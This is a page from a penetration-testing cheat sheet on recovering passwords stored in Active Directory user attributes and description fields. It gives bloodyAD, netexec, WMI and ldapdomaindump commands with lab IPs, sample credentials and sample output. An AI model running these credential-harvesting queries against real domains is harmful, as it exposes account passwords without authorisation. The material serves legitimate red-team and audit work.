pwd-comments.md (1911B)
1 --- 2 title: "Password - AD User Comment" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/pwd-comments.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-comments.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Password - AD User Comment 12 13 There are 3-4 fields that seem to be common in most Active Directory schemas: `UserPassword`, `UnixUserPassword`, `unicodePwd` and `msSFU30Password`. 14 15 * Windows/Linux command 16 17 ```ps1 18 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePassword=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description 19 ``` 20 21 * Password in User Description 22 23 ```powershell 24 netexec ldap domain.lab -u 'username' -p 'password' -M user-desc 25 netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users 26 GET-DESC... 10.0.2.11 389 dc01 [+] Found following users: 27 GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain 28 GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account 29 ``` 30 31 * Get `unixUserPassword` attribute from all users in ldap 32 33 ```ps1 34 nxc ldap 10.10.10.10 -u user -p pass -M get-unixUserPassword -M getUserPassword 35 ``` 36 37 * Native Powershell command 38 39 ```powershell 40 Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID 41 ``` 42 43 * Dump the Active Directory and `grep` the content. 44 45 ```powershell 46 ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ 47 ```